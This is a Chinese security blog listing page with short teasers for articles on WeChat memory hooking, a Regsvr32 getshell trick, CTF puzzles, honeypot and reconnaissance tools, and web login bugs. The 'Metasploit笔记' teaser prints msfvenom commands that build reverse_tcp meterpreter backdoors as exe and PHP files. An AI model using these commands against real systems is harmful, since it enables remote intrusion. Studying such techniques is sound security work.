关注我们

  • PC微信逆向:使用HOOK获取好友列表和群列表

    PC微信逆向:使用HOOK获取好友列表和群列表

    获取好友列表目前有三种方法,第一种就是二叉树遍历,通过一层一层的往下读取来拿到所有的好友列表。第二种是通过在内存里面找好友的地址列表。第三种就是通过查找微信数据库来获取列表获取好友列表的切入点要想获取微信的好友列表,就必须找到微信读取好友列...

    迷糊的少年 安全文摘 2019.08.10 736206
  • 通过Regsvr32的ole绕过Getshell小技巧

    通过Regsvr32的ole绕过Getshell小技巧

    1.声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容...

    悠然 安全文摘 2019.08.10 472512
  • 来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种

    来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种

    在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。对就是这货怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.但是好像没有卵用.正好小表弟好像对这个比较了解,我去问问他咋回事儿小表弟下班回家后...

    安云 安全文摘 2019.08.08 521510
  • CTF之md5截断比较验证填坑

    CTF之md5截断比较验证填坑

    背景CTF有个特别狗,也特别烦的东西,就是MD5截断验证,今天我就遇到了.正文嗯,举个栗子啥意思呢?就是说,验证明文(Code)+随机字符串(fTyHgZII)在md5加密之后截取前六位等于b77333来,看效果注释有了,按题目需求,直接改...

    安云 安全文摘 2019.08.08 544796
  • Metasploit笔记

    Metasploit笔记

    生成exe后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe生成PHP后门msfvenom -p php/meterpre...

    安云 安全文摘 2019.08.08 488396
  • Hfish企业安全测试主动攻击型蜜罐钓鱼框架系统

    Hfish企业安全测试主动攻击型蜜罐钓鱼框架系统

    HFish 是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统,为了企业安全防护测试做出了精心的打造多功能 不仅仅支持 HTTP(S) 钓鱼,还支持 SSH、SFTP、Redis、Mysql 等扩展性 提供...

    Lzers 安全工具 2019.08.07 598925
  • OneForAll一款功能强大的子域收集工具

    OneForAll一款功能强大的子域收集工具

    OneForAll是一款功能强大的子域收集工具项目简介在渗透测试中信息收集的重要性不言而喻,子域收集是信息收集中必不可少且非常重要的一环,目前网上也开源了许多子域收集的工具,但是总是存在以下部分问题:不够强大,子域收集的接口不够多,不能做到...

    Lzers 安全工具 2019.08.07 588800
  • 《故事会》20年前的纸上暗网

    《故事会》20年前的纸上暗网

    在互联网还不发达的年代,大多数男生的童年的精神世界是如此匮乏,以至于在老旧的台式机上玩把《红警》,都能成为最高级的享受。但打游戏要偷偷摸摸,往往危险而且时间短暂,那个年代,大多数人的精神享受往往还是来源于阅读。在金庸著作都被翻烂之后,很多男...

    Lzers 安全文摘 2019.08.06 738626
  • 腾讯QQ快速登录漏洞

    腾讯QQ快速登录漏洞

    前言一婊哥说他把这洞提交给腾讯,腾讯说没有危害还说会修复,修复就修复还不给 Rank (婊哥还说腾讯就想白P)正文今天我想着到来写点日记。。毕竟总是忘了这忘了那的。然后打开我亲爱的有道云.点了下QQ快速登录。。发现。。调...

    Lzers 安全文摘 2019.08.06 622212
  • 一个很好玩的漏洞

    一个很好玩的漏洞

    背景这个漏洞很神奇,可能大佬们都见过,我嘞,就是跑龙套的,记录一下这个漏洞.正文开始环境FirefoxBurpSuite过程一个网站,登录入口我们没有账号密码,所以注册一个正常的登录登录成功然后,访问manage,嘿!眼熟吧,没有权限.正常...

    Lzers 安全文摘 2019.08.06 542618